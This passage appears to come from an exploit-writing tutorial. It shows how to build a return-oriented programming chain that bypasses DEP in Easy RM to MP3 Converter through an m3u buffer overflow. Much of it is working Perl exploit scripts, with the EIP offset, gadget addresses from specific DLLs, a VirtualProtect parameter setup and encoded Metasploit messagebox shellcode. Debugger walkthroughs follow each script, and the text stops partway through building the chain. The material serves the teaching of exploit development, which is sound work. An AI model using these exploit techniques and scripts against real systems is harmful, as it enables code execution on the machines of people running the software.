In this example, I will try to build a ROP based exploit for Easy RM to MP3 Converter, the vulnerableapplication which was used earlier in tutorial 1.Note : the offsets and addresses may be different on your system. Don’t just blindlycopy everything from this tutorial, but try it yourself and adjust addresses wherenecessary.Easy RM to MP3 Converter is vulnerable to a buffer overflow when opening a m3u file that containsan overly long string.  Using a cyclic pattern, we discover that EIP gets overwritten after 26094bytes. Again, this is the offset on my system. If the offset is different, then change the scriptaccordingly. The offset is based on the location where the m3u file is placed on your system, as theapplication will prepend your buffer with the full path to the file. You can calculate the offset with20000 A’s + 7000 char Metasploit pattern). Anyways, the skeleton exploit script (perl) will look something like this :#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be:8800my $file= "rop.m3u";my $buffersize = 26094;my $junk = "A" x $buffersize;my $eip="BBBB";my $rest = "C" x 1000;my $payload = $junk.$eip.$rest;print "Payload size : ".length($payload)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);
print "m3u File $file Created successfully\n";If our offset is correct, EIP should get overwritten with BBBB (42424242) ...
... and ESP points at an address that contains our C’s.  So far so good, this is a typical direct REToverwrite exploit.If it wasn’t for DEP, we would place our shellcode at ESP (instead of the C’s) and overwrite EIP with apointer to jmp esp. But we cannot do that because the shellcode won’t get executed due to DEP.So we will create a ROP chain that will use the VirtualProtect() function (kernel32.dll) to change theaccess protection level of the memory page where the shellcode is located, so it can get executed.In order to make that work, we will need to pass a number of parameters to this function. Theseparameters need to sit at the top of the stack at the time the function gets called.There are a few ways to do this.  We can put the required values in registers and then issue apushad (which will put everything on the stack in one time). A second technique would be to putsome of the parameters (the static ones/the ones without null bytes) on the stack already, and usesome ROP gadgets to calculate the other parameters and write them onto the stack (using somekind of sniper technique).We cannot use null bytes in the m3u file, because Easy RM to MP3 Converter would treat the data inthe file as a string, and the string would get terminated at the first null byte.  We also need to keepin mind that we’ll most likely end up with some character set limitations (we’ll simply createencoded shellcode to overcome this issue)Enough small talk, let’s get started. How to build the chain (chaining basics)In order to bypass DEP, we will need to build a chain of existing instructions.  Instructions which canbe found in all modules (as long as they’re executable, have a static address and don’t contain nullbytes then it should be fine).Basically, since you will need to put data on the stack (parameters to a function that will bypassDEP), you will be looking for instructions that will allow you to modify registers, push and pop datato and from the stack and so on.Each of those instructions will – somehow – need to "jump" to the next instruction (or set ofinstructions) you want to execute.  The easiest way to do this, is by making sure the instruction isfollowed by a RET instruction. The RET instruction will pick up the next address from the stack andjump to it. (After all, we start our chain from the stack, so the RET will return to the stack and takethe next address). So basically, in our chain, we will be picking up addresses from the stack and
jump to them. The instructions at those addresses can pick up data from the stack (so these byteshave to be placed in the right place of course).  The combination of those two will form our ropchain.Each "instruction+RET" is called a "ROP gadget".This means that, in between pointers (pointers to instructions), you can put data that can get pickedup by one of the instructions. At the same time, you will need to evaluate what the instructions willdo and how that will impact the spacing you need to introduce between 2 pointers on the stack.  Ifan instruction performs ADD ESP,8, then this will shift the stack pointer, and that will have animpact on where the next pointer must be placed. This is required so the RET at the end of a gadgetwould return to the pointer of the next instruction.I guess it is becoming clear that your ROP routine will most likely consume a good amount of byteson the stack.  So the available buffer space for your rop routine will be important.If all of this sounds complicated, then don’t worry. I’ll use a little example to make things clear :Let’s say, as part of our ROP routine, we need to take a value from the stack, put it in EAX, andincrease it with 0×80. In other words :we need to find a pointer to POP EAX + RET and put it on the stack (gadget 1)the value that must be placed into EAX must be placed right below the pointerwe need to find another pointer (to ADD EAX,80 + RET) and place it right below the value thatis popped into the stack  (gadget 2)we need to jump to the first gadget (pointer to POP EAX+RET) to kick off the chainWe will talk about finding rop pointers in a few minutes. For now, I’ll just give you the pointers :10026D56  : POP EAX + RET : gadget 11002DC24 : ADD EAX,80 + POP EBX + RET : gadget 2(the second pointer will also execute POP EBX.  This will not break our chain, but it will have animpact on ESP and the padding that needs to be used for the next rop gadget, so we have to insertsome "padding" to compensate for that)So, if we want to execute those 2 instructions after each other, and end up with our desired value ineax, then the stack would be set up like this : Stack addressStack valueESP points here ->0010F73010026D56 (pointer to POP EAX + RET) 0010F73450505050 (this will be popped into EAX) 0010F7381002DC24 (pointer to ADD EAX,80  + POP EBX + RET) 0010F73CDEADBEEF (this will be popped into EBX, padding)So, first, we will need to make sure 0×10026D56 gets executed. We are at the beginning of oursploit, so we just have to make EIP point to a RET instruction.  Find a pointer that points to RET inone of the loaded modules and put that address into EIP. We will use 0×100102DC.When EIP is overwritten with a pointer to RET, it will obviously jump to that RET instruction. The RETinstruction will return to the stack, taking the value at ESP (0×10026D56) and jump to it.  That willexecute POP EAX and will put 50505050 into EAX.  The RET after POP EAX (at 0×10026D57) willjump to the address that is at ESP at this time. This will be 0×1002DC24 (because 50505050 waspopped into eax first).  0×1002DC24 is the pointer to ADD EAX,80 + POP EBX + RET, so that nextgadget will add 0×80 to 50505050.
Our example sploit will look like this :#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be:8800my $file= "rop.m3u";my $buffersize = 26094;my $junk = "A" x $buffersize;my $eip=pack('V',0x100102DC);  #pointer to RETmy $junk2 = "AAAA"; #compensate, to make sure ESP points at first rop gadgetmy $rop = pack('V',0x10026D56);       #POP EAX + RET (gadget 1)$rop = $rop . pack('V',0x50505050);   #this will be popped into EAX$rop = $rop . pack('V',0x1002DC24);   #ADD EAX,80 + POP EBX + RET (gadget 2)$rop = $rop . pack('V',0xDEADBEEF);   #this will be popped into EBXmy $rest = "C" x 1000;my $payload = $junk.$eip.$junk2.$rop.$rest;print "Payload size : ".length($payload)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);print "m3u File $file Created successfully\n";Attach the debugger to the application and set a breakpoint on 0×100102DC.  Run the applicationand load the m3u file. The breakpoint should get hit :
When the breakpoint gets hit, EIP points at our RETN instruction. You can see in the small windowbelow the CPU view that this RET instruction will return to 0×10026D56 (which sits at the top of thestack, the location where ESP point at)If we now step through, one instruction at a time (F7), this is what happens :RETN : EIP jumps to 0×10026D56, ESP moves to 0010F734POP EAX : This will take 50505050 from the stack and place it into EAX. ESP moves to0010F738RETN : This will put 1002DC24 into EIP and moves ESP to 0010F73CADD EAX,80 : This will add 0×80 to 50505050 (EAX)POP EBX : This will put DEADBEEF into EBX and will increase ESP with 4 bytes again (to0010F740)
RETN : This will take the next pointer from the stack and jump to it (43434343 in thisexample)Right before the last RETN is executed, we should see this :
As you can see, we have been able to execute instructions and craft values in registers, withoutexecuting a single opcode directly from the stack. We have chained existing instructions to eachother, which is the essence of ROP.Make sure you understand the concept of chaining before continuing. Finding ROP gadgetsA few moments ago, I have explained the basics of ROP chains. In essence you will need to findinstructions/instruction sequences that are followed by a RET instruction (RETN, RETN 4, RETN 8and so on), which will allow you to "jump" to the next sequence/gadget.There are 2 approaches to finding gadgets that will help you building the ROP chain :You can specifically search for instructions and see if they are followed by a RET.  Theinstructions between the one you are looking for, and the RET instruction (which will end thegadget) should not break the gadget.You can look for all RET instructions and then walk back, see if the previous instructionsinclude the instruction you are looking for.In both cases, you can use the debugger to search for instructions, search for RET, etc. Manuallysearching these instructions, however, may be very time consuming.Furthermore, if you use the "list all ret’s and look back" approach (which will produce more resultsat once and give you more accurate results), you may have to do some opcode splitting to findadditional gadgets (that will end with the same ret).This may sound a bit vague, so I’ll give you an example.Let’s say you found a RET at 0×0040127C  (opcode 0xC3).  In the debugger CPU view, theinstruction before the ret is ADD AL,0×58 (opcode 0×80 0xc0 0×58). So you have found a gadgetwhich will add 0×58 to AL
These 2 instructions can produce another gadget, by splitting the opcode of the ADD instruction.The last byte of the ADD instruction is 58. And that’s the opcode for POP EAX.That means that there is a second rop gadget, starting at 0×0040127E :
You may not have discovered this one if you have been looking for RETs and then looking at theprevious instructions in the debugger view.In order to make your life a little bit easier, I have written a function in pvefindaddr, which willlook for all rets (RETN, RETN 4, RETN 8 and so on),look back (up to 8 instructions),and will do "opcode splitting" to find new gadgets, ending with the same RETSo all you have to do, to build your set of rop gadgets, is running !pvefindaddr rop, and it will giveyou a huge number of rop gadgets to play with.  And if your pointers (rop gadgets) should be nullbyte free, then simply run "!pvefindaddr rop nonull".The function will write all ROP gadgets to a file "rop.txt" into the Immunity Debugger programfolder.  Note that this operation is very CPU intensive, and it can take up to a day to generate allgadgets (depending on the number of loaded modules).  My advise is to find the modules you wantto use (!pvefindaddr noaslr) and then run !pvefindaddr rop <modulename> instead of blindlyrunning it on all modules.You can create the rop gadgets from a specific module by specifying the module name  (forexample :  "!pvefindaddr rop MSRMfilter03.dll")
Note : "!pvefindaddr rop" will automatically ignore addresses from ASLR modules ormodules that might get rebased. This will help ensuring that the result (rop.txt) onlycontains pointers that should result in a more or less reliable exploit. If you insist onincluding pointers from those modules, you’ll have to manually run !pvefindaddr rop<modulename> for each of those modules."CALL register" gadgetsWhat if you are looking for a particular instruction, but can’t seem to find a gadget that ends with aret ?  What if you have performed a search for the instruction in your favorite loaded module, anddiscovered that the only one you could find, has a "CALL register" instruction before the RET ?Not all is lost in this case.First of all, you should find a way to put a meaningful pointer in that register. Just have a pointer siton the stack and find yourself a gadget that will put this value into the register.  That will make surethat the CALL reg instruction will actually work.This pointer could be just a RET, allowing you to do as if the CALL instruction never existed.  Or youcan simply use a pointer to another rop gadget to continue your rop chain.pvefindaddr rop will also list gadgets that have a call reg instruction before the RET Gotcha. But how/where exactly do I start ?The first things you have to do, before writing a single line of code, is setting your strategy, byasking yourself the following questions :What technique (Windows API) will I use to bypass DEP and what are the consequences interms of stack setup / parameters that need to be created on the stack. What is the currentDEP policy and what are your options in terms of bypassing it ?What are the rop gadgets I can use ?  (This will be your toolbox and will allow you to craftyour stack.)How to start the chain ? How to pivot to your controlled buffer ?  (In a direct RET exploit, youmost likely control ESP, so you can simply overwrite EIP with a pointer to RETN to kick startthe chain)How will you craft the stack ?
Answers :Technique : In this example, I will use VirtualProtect() to modify the protection parameters ofthe memory page where the shellcode is located. You can obviously use one of the otherDEP-policy-compatible functions, but I will use VirtualProtect() in this example. This functionrequires the following parameters to sit at the top of the stack when the function gets called :return address. After the VirtualProtect() function has finished, this is where thefunction will return to.  (= pointer to the location where the shellcode is placed.Dynamic address, will need to be generated at runtime (rop))lpAddress : pointer to the location where the shellcode is placed. This is a dynamicaddress that will need to be generated at runtime (rop)Size : speaks for itself, will need to be generated at runtime (unless your exploit buffercan deal with null bytes, but that is not the case with Easy RM to MP3)flNewProtect : new protection flag. This value must be set to 0×20 to mark the pageexecutable. This value contains null bytes, so this value may have to be generated atruntime as welllpflOldProtect : pointer, will receive the old protection flag value. This can be a staticaddress, but must be writeable. I’ll take an address from one of the modules from EasyRM to MP3 Converter (0×10035005)ROP gadgets : !pvefindaddr ropStart the chain : pivot to the stack. In this example, it’s a direct RET overwrite, so we just needa pointer to RET. We already have a working pointer (0×100102DC)Crafting the stack can be done in various ways. You can put values into registers and thempush them onto the stack. You can have some values sit on the stack and write the dynamicones using a sniper technique. Building this logic, this puzzle, this Rubik’s cube, is probablythe hardest part of the entire ROP building process.Our encoded shellcode ("spawn a messagebox") will be around 620 bytes and will be initially storedsomewhere on the stack. (We’ll have to encode our shellcode because Easy RM to MP3 has somecharacter limitations)Our buffer / stack will look something like this :junkeipjunkrop chain to generate/write the parametersrop chain to call the VirtualProtect functionmore rop / some padding / nopsshellcodejunkand at the time the VirtualProtect function is called, the stack is modified (by the rop chain) to looklike this : junk eip junk ropESP points here ->parameters more rop padding / nops shellcode junk
Test before you startBefore actually building the rop chain, I will verify that the VirtualProtect() call will lead to thedesired result. The easiest way to do this, is by manually crafting the stack / function parametersinside the debugger :make EIP point at the VirtualProtect() function call. On XP SP3, this function can be found at0×7C801AD4manually put the desired arguments for VirtualProtect() onto the stackput the shellcode on the stacklaunch the function.If that works, I’m sure that the VirtualProtect() call will work, and that the shellcode works as well.In order to facilitate this simple test, we’ll use the following sploit script :#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be:8800my $file= "rop.m3u";my $buffersize = 26094;my $junk = "Z" x $buffersize;my $eip=pack('V',0x7C801AD4);  #pointer to VirtualProtectmy $junk2 = "AAAA"; #compensatemy $params=pack('V',0x01010101);   #return address$params = $params."XXXX";          #lpAddress$params = $params."YYYY";          #Size - Shellcode length$params = $params."ZZZZ";          #flNewProtect$params = $params.pack('V',0x10035005);   #writeable address# ./msfpayload windows/messagebox#  TITLE=CORELAN TEXT="rop test by corelanc0d3r" R# | ./msfencode -e x86/alpha_mixed -t perlmy $shellcode ="\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" ."\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" ."\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" ."\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" ."\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51" ."\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49" ."\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46" ."\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c" ."\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45" ."\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48" ."\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47" ."\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48" ."\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47" ."\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e" ."\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49" ."\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48" ."\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49" ."\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49" ."\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e" ."\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" ."\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42" ."\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44" ."\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e" ."\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b" ."\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51" ."\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43" ."\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50" ."\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51" ."\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50" .
"\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c" ."\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48" ."\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e" ."\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b" ."\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50" ."\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e" ."\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51" ."\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50" ."\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43" ."\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43" ."\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50" ."\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48" ."\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46" ."\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e" ."\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45" ."\x5a\x41\x41";my $nops = "\x90" x 200;my $rest = "C" x 300;my $payload = $junk.$eip.$junk2.$params.$nops.$shellcode.$rest;print "Payload size : ".length($payload)."\n";print "Shellcode size : ".length($shellcode)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);print "m3u File $file Created successfully\n";With this script, we will overwrite EIP with a pointer to VirtualProtect() (0×7C801AD4), and we willput the 5 required parameters on top of the stack, followed by some nops, and messageboxshellcode.The lpAddress, Size and flNewProtect parameters are set to "XXXX", "YYYY" and "ZZZZ". We willmanually change them in a few moments.Create the m3u file, attach Immunity Debugger to the application and set the breakpoint to0×7C801AD4. Run the application, open the m3u file and verify that the breakpoint was hit :
 Now look at the top of the stack. We should see our 5 parameters :
Scroll down until you see the begin of the shellcode :
Take note of the base address of the shellcode (0010F80C in my case) and scroll down to verify thatthe entire shellcode was placed onto the stack.The idea is now to manually edit the parameters on the stack so we can test if the VirtualProtect callwould work.Editing a value on the stack is as simple as selecting the value, pressing CTRL+E, and entering anew value (just remember that it’s little endian !).First, edit the value at 0010F730 (return address) and set it to the address of the shellcode(0010F80C).
Then edit the value at 0010F734 (Address, now containing 58585858), and set it to 0010F80C(again, the address where your shellcode resides)
Next, edit the value at 0010F738 (Size, now containing 59595959) and set it to the size of theshellcode. I’ll just take 700 bytes (to be on the safe side), which corresponds with 0×2BC
It’s ok to be a little bit "off", just make sure that your shellcode will be contained withinthe Address+Size range.  You will see that it might be difficult to craft an exact valuewhen using rop, so it’s important to understand that you don’t have to be exact. If yousurround your code with nops and if you make sure you end up covering all of theshellcode, then it should be fine.Finally, edit the value at 0010F73C (NewProtect) and set it to 0×40 :
 After making the modifications, the stack looks like this :
Press F7 once and watch how the jump to VirtualProtect() is made.
As you can see, the function itself is pretty short, and, apart from a few stack interactions, onlycontains a call to VirtualProtectEx. This function will change the access protection level.Continue to step through the instructions (F7) until you reach the RETN 10 instruction (at0×7C801AED).At that point, the stack contains this :
The ret will make the jump to our shellcode and execute it (if all went well).Press F9 :
This means that the VirtualProtect() technique was successful.Now it’s time to stop playing & make it generic ( = create the dynamic values at runtime). Everybody stay cool, this is a roppery
If you were hoping for some generic instructions to build a ROP chain, then I have to disappointyou. There is no such thing.  What follows is the result of some creativity, trial & error, some asmfacts, and the output of !pvefindaddr rop.The only thing that might come close to a possible "more or less generic "rop structure (this is justone that has been working well for me) might look something like this :
As you can see, we basically limit the number of instructions (rop gadgets) at the beginning of thechain. We just save the stack pointer and then make a jump (over the Virtualprotectfunction/parameters), which will make it easier to overwrite the parameter placeholders later on.(Don’t worry – you’ll understand what I mean in a few moments)The function pointer/parameter placeholders are obviously not rop gadgets, but just static datathat is placed on the stack, as part of your buffer. The only thing you will need to do ischange/overwrite the placeholders with the dynamically created values, using a rop chain that islocated after the placeholders.First of all, we will have to change the address that was used to overwrite EIP in our test script.Instead of making a call directly to VirtualProtect(), we now have to return to the stack. So we needto overwrite EIP with a pointer to RETN.  We’ll use the one that was found earlier : 0×100102DCNext, we need to think about the possible options to craft our values and put them in the rightplace on the stack.Pointer to shellcode : one of the easiest ways to do this, is by taking the address of ESP,
putting it in a register, and increasing it until it points at the shellcode. There may be otherways, we will really have to look what is at our disposal based on the output in rop.txtSize variable : You can either set a register to a start value and increase it until it contains0×40.  Or you can look for an ADD or SUB instruction on a register which will, when it getsexecuted, produce 0×40. Of course, you will have to put (POP from the stack) the start valueinto that register first.Putting the dynamically generated data back to the stack can be done in various ways as well.You can either put the values, in the right order, in the registers and do a pushad to put themon the stack.  Alternatively you can write to specific locations on the stack using "MOVDWORD PTR DS:[registerA+offset],registerB" instructions. RegisterB must contain the desiredvalue first, of course.So it’s clear that you will have to look at rop.txt, your toolbox, and see what approach will work.You will obviously need to find instructions that will not mess up the flow or changeother registers/values... and if they do, perhaps you can take advantage of that.  Theprocess of building a rop chain is pretty much like solving a Rubik’s [tm] cube.  Whenyou execute one instruction, it might have an impact on other registers/stacklocations/....  The goal is to try to take advantage of them (or to avoid them altogetherif they would really break the chain)Anyways, start by creating your rop.txt file.  If you insist on using pointers from application dll’s,then you can create multiple rop files, each targeting a specific module.  But as long as you are hardcoding the function pointer to a Windows OS API, using the address from the OS dll itse,f, then itmight not make any sense to avoid OS dll’s.Alternatively, it might be worth while verifying if one of the application dll’s contains the samefunction call. That would help making the exploit portable and generic. (see "ASLR" later on)In this example, I will be using VirtualProtect(). The application specific modules that can be usedare either the executable itself (not subject to ASLR) and msrmfilter03.dll (not subject to ASLR andwill not get rebased either).  So, load both files into IDA free and see if one of these modulescontains a call to VirtualProtect(). If that is the case, we might as well try to use a pointer from theapplication itself. Result : no calls found, so we’ll have to use the address from kernel32.dllAll good – let’s get started – for real Stage 1 : saving stack pointer and jumping over the parameters 2 of our VirtualProtect() function parameters need to point at our shellcode.  (Return address andlpAddress).  Since the shellcode is placed on the stack, the easiest way to do this, is by taking thecurrent stack pointer and storing it in a register.  This has 3 advantages :you can easily add/sub the value in this register to make it point at your shellcode. ADD, SUB,INC, DEC instructions are pretty commonthe initial value points is pretty close to the stack address where the pointer to VirtualProtect()is located.  We might be able to take advantage of that at the end of the rop chain, when weneed to jump back and call VirtualProtect()this value is also close to the stack location of the parameter placeholders. That might make iteasy to use a "mov dword ptr ds:[register+offset],register" instruction to overwrite theparameter placeholder.Saving the stack pointer can be done in many ways : MOV REG,ESP / PUSH ESP + POP REG, etcYou will notice that MOV REG,ESP is not a good choice, because it’s very likely that, inside the same
gadget, the REG will be popped again, thus overwriting the stack pointer in REG again.After doing a quick search in rop.txt, I found this :0x5AD79277 : # PUSH ESP # MOV EAX,EDX # POP EDI # RETN   [Module : uxtheme.dll] The stack pointer is pushed to the stack, and picked up in EDI.  That’s nice, but, as you will learn,EDI is not a really popular register in terms of instructions that would do ADD/SUB/... on thatregister. So it might be a good idea to save the pointer into EAX as well. Furthermore, we mightneed to have this pointer in 2 registers because we’ll need to change one so it would point to theshellcode, and we might need to use the other one to point it to the location on the stack where thefunction parameter placeholder is located.So, another quick search in rop.txt gives us this :0x77C1E842 :  {POP}  # PUSH EDI # POP EAX # POP EBP # RETN  [Module : msvcrt.dll] This will save the same stack pointer into EAX as well.  Pay attention to the POP EBP instruction. Wewill need to add some padding to compensate for this instruction.Ok, that’s all we need for now.  I really like to avoid writing too much gadgets before the functionpointer / parameters, because that might make it harder to overwrite the parameter placeholders. So what is left now, is jumping over the function block.The easiest way to do this, is by adding some bytes to ESP, and returning... :0x1001653D :  # ADD ESP,20 # RETN   [Module : MSRMfilter03.dll] So far, our exploit script looks this :#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be:8800#------------------------------------------------------------my $file= "rop.m3u";my $buffersize = 26094;my $junk = "Z" x $buffersize;my $eip=pack('V',0x100102DC); #return to stackmy $junk2 = "AAAA"; #compensate#------Put stack pointer in EDI & EAX------------------------#my $rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI$rop = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX$rop=$rop."AAAA"; #compensate for POP EBP#stack pointer is now in EAX & EDI, now jump over parameters$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20#-------Parameters for VirtualProtect()----------------------#my $params=pack('V',0x7C801AD4);          #VirtualProtect()$params = $params."WWWW";   #return address (param1)$params = $params."XXXX";   #lpAddress      (param2)$params = $params."YYYY";   #Size           (param3)$params = $params."ZZZZ";   #flNewProtect   (param4)$params = $params.pack('V',0x10035005);  #writeable address$params=$params.("H" x 8);  #padding# ADD ESP,20 + RET will land here#my $rop2 = "JJJJ";
#my $nops = "\x90" x 240;### ./msfpayload windows/messagebox#  TITLE=CORELAN TEXT="rop test by corelanc0d3r" R# | ./msfencode -e x86/alpha_mixed -t perlmy $shellcode ="\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" ."\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" ."\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" ."\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" ."\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51" ."\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49" ."\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46" ."\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c" ."\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45" ."\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48" ."\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47" ."\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48" ."\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47" ."\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e" ."\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49" ."\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48" ."\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49" ."\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49" ."\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e" ."\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" ."\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42" ."\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44" ."\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e" ."\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b" ."\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51" ."\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43" ."\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50" ."\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51" ."\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50" ."\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c" ."\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48" ."\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e" ."\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b" ."\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50" ."\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e" ."\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51" ."\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50" ."\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43" ."\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43" ."\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50" ."\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48" ."\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46" ."\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e" ."\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45" ."\x5a\x41\x41";my $rest = "C" x 300;my $payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;print "Payload size : ".length($payload)."\n";print "Shellcode size : ".length($shellcode)."\n";open($FILE,">$file");print $FILE $payload;close($FILE);print "m3u File $file Created successfully\n";Create the m3u file, attach Immunity to the application, set a breakpoint at 0×100102DC, open the
file and wait until the breakpoint is hit.When the breakpoint is hit, look at the stack. You should see your mini rop-chain, followed by thepointer to VirtualProtect and its parameters (placeholders), and then the location where we shouldend up after modifying ESP :
